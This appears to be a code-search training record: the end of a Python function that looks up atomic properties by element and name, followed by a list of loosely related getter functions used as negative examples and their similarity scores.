        return periodicTable.GetAtomicNumber(element)
    elif propertyname == "Rv":
        return periodicTable.GetRvdw(element)
    elif propertyname == "Rc":
        return periodicTable.GetRb0(element)
    elif propertyname == "Zv":
        return periodicTable.GetDefaultValence(element)
    else:
        PropertyDic = AtomProperty[element]
        return PropertyDic[propertyname]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GetRelativeAtomicProperty(element='C',propertyname='m'):\n \n CpropertyDic = float(GetAbsoluteAtomicProperty('C', propertyname))\n PropertyDic = float(GetAbsoluteAtomicProperty(element, propertyname))\n \n return PropertyDic/CpropertyDic",
"def get_property(self,name):\n return self.dp.get_property(name)",
"def find_atom_by_property(atoms: t.List[Atom], property_value: any, property_name: str = \"id\") -> Atom:\r\n\r\n if (all([hasattr(a, property_name) for a in atoms])):\r\n all_hits = list(filter(lambda a: a.id == property_value, atoms))\r\n if len(all_hits) == 0:\r\n raise ValueError('There is no atom with id: ' + str(id))\r\n elif len(all_hits) > 1:\r\n raise ValueError('There is more than one atom with id: ' + str(id))\r\n else:\r\n return all_hits[0]\r\n else:\r\n raise ValueError(\"atom does not have Property: \" + property_name + \" but: \" + str(vars(atoms[0])))",
"def getAtom(self, atomname):\n if self.hasAtom(atomname):\n return self.atoms[atomname]\n else:\n return None",
"def get_atom(self, name, alt_loc = None):\n if alt_loc:\n if self.alt_loc_dict.has_key(name):\n altloc = self.alt_loc_dict[name]\n if altloc.has_key(alt_loc):\n return altloc[alt_loc]\n return None\n else:\n if not self.atom_dict.has_key(name):\n return None\n return self.atom_dict[name]",
"def get_window_property(self, connection, window, atom):\n self.logger.debug(\"Getting property %s from window %s\", atom, window)\n cookie = connection.core.GetProperty(\n False,\n window,\n atom,\n GetPropertyType.Any,\n 0,\n 2 ** 32 - 1\n )\n reply = cookie.reply()\n return self.get_property_value(reply)",
"def value_of_css_property(self, name):\n return self.element.value_of_css_property(name)",
"def get_property(self, property):\n return self.shell([\"getprop\", property])",
"def getprop(self, prop_name):\n return self.shell(\"getprop %s\" % prop_name)",
"def getProperty(propname):",
"def getprop(self, prop_name):\n return self.shell('getprop %s' % prop_name).decode('utf-8').strip()",
"def get_equivalent_atom(self, atom):\n try:\n return self.atom_dict[atom.name]\n except KeyError:\n return None",
"def getProperty(unique_name):",
"def get_dynamic_property(vim, mobj, type, property_name):\n properties = get_dynamic_properties(vim, mobj, [property_name], type)\n property_value = None\n if property_name in properties:\n property_value = properties.get(property_name)\n return property_value",
"def get_equivalent_atom(self, atom):\n try:\n return self.chain_dict[atom.chain_id].fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_equivalent_atom(self, atom):\n try:\n return self.fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_property(self, name):\n if (not name in self.properties):\n raise KeyError(\"Key '\" + name + \"' not found\")\n return self.properties[name]",
"def get(self, prop):\r\n prop_parts = prop.split(\".\")\r\n val = None\r\n for part in prop_parts:\r\n if val is None:\r\n val = self.obj.get(part)\r\n else:\r\n val = val.get(part)\r\n return val",
"def get_property_value(prop, paths):\n\n data = parse_config(paths)\n return data.get(prop)",
"def get_property_value(self, property, db):\n try:\n for p in self.properties:\n if p.idProperty == int(property):\n return p.get_value()\n except:\n return None",
"def get_equivalent_atom(self, atom):\n try:\n return self.model_dict[atom.model_id].chain_dict[atom.chain_id].fragment_dict[atom.fragment_id].atom_dict[atom.name]\n except KeyError:\n return None",
"def get_prop(node, name):\n title = node.get(\"title\")\n props = title.split(\";\")\n for prop in props:\n (key, args) = prop.split(None, 1)\n args = args.strip('\"')\n if key == name:\n return args\n return None",
"def get_property(prop, project):\n result = re.search(\n r'{}\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]'.format(prop),\n open(project + \"/__init__.py\").read(),\n )\n return result.group(1)",
"def get_value (property):\n assert is_iterable_typed(property, basestring) or isinstance(property, basestring)\n return replace_grist (property, '')",
"def get_dynamic_property(vim, mobj, type, property_name):\r\n obj_content = \\\r\n get_object_properties(vim, None, mobj, type, [property_name])\r\n property_value = None\r\n if obj_content:\r\n dynamic_property = obj_content[0].propSet\r\n if dynamic_property:\r\n property_value = dynamic_property[0].val\r\n return property_value",
"def propget(self, name):\r\n res = self._svn('propget', name)\r\n return res[:-1] # strip trailing newline\r",
"def prop(self):\n return getattr(self, name)",
"def do_get_property(self, spec):\n attribute = self.find_attribute(spec.name)\n if attribute is not None and isinstance(attribute, property):\n return attribute.fget(self)\n else:\n raise ValueError(\"No such property\", spec.name)",
"def getprop(name):\n return _slp.getprop(name)",
"def get_owner(self, property_name):\n\n property_owner = self.db.read_value(property_name, \"owner\")\n return property_owner"
] |
[
"0.65785086",
"0.6322747",
"0.61566937",
"0.60482395",
"0.60195005",
"0.5999082",
"0.5951637",
"0.59448093",
"0.5930747",
"0.5896596",
"0.58638",
"0.585692",
"0.5847448",
"0.58387524",
"0.5810104",
"0.57515085",
"0.574562",
"0.5737195",
"0.5735811",
"0.5706954",
"0.5691982",
"0.56782854",
"0.56739104",
"0.5666777",
"0.56634206",
"0.5662688",
"0.5657446",
"0.56308323",
"0.55689484",
"0.5559896"
] |
0.71773916
|
0
|